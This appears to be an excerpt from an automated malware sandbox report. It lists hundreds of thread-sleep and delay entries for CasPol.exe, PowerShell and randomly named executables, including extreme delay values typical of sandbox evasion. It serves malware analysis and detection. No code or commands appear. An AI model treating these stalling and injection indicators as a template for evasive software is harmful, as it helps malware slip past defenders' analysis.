Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -596587s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -596469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -596314s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -596195s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -596031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -595886s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -595725s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -595547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -595313s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -595068s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5996	Thread sleep time: -2100000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -594750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -594500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -594312s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -594125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -593964s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -593811s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -593670s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -593516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -593281s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -593004s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -592625s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -592438s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -592312s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -592156s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -591949s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -591796s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -591671s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -591560s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -591375s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -591249s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -591094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -590957s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -590828s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -590469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -590208s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -590047s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -589937s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -589803s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -589656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -589516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -589390s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -589248s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -589094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -588891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -588780s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -588653s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -588413s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -587734s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -586219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -585938s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -585750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -585576s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -585344s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -584969s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -584750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -584453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -584297s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -584047s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -583813s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -583500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -583172s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -582906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -582596s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -582422s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -582188s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -581953s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -581547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -581321s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -581128s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -580875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -580578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -580188s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -579906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -579764s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -579406s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -579044s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -578563s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -578338s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -578031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -577763s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -577521s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -577154s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -576891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -576469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -576109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -575781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -575500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -575063s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -574807s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -574547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -574217s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -573899s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -573678s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -573078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -572563s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -572187s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -571719s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -571317s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -568628s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -568222s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -567753s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -567200s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -566887s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -566361s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -565720s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -565173s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -564829s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -564431s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -563642s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -563017s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -562501s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -561486s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -561133s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -560704s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -560389s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -559830s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -559142s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -558689s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -558220s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -557329s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -556421s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -554874s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -553561s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -551613s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -549926s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -548660s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -547398s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -545719s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -543459s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -541676s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -539573s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -535870s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -533120s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -531120s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -529432s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -527057s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -525792s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -525120s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -523729s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -522526s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -521198s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -512881s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -508316s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -504441s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -500176s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -496369s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -495879s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -494660s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -492910s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -490707s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -489629s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -488301s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -485957s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -484097s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -482535s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -480863s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -479613s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -478207s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1104	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6864	Thread sleep count: 1408 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5476	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5476	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe TID: 1900	Thread sleep count: 61 > 30
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe TID: 7832	Thread sleep count: 352 > 30
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe TID: 7832	Thread sleep time: -70400s >= -30000s
Source: C:\Users\user\Pictures\QsTe5POhA2TpmBwMLub9ymVB.exe TID: 7328	Thread sleep time: -108000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\Pictures\QsTe5POhA2TpmBwMLub9ymVB.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 597747	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 597591	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 597482	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 597372	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 597263	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 597027	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 596811	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 596587	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 596314	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 596195	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 595886	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 595725	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 595547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 595313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 595068	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 594750	Jump to behavior
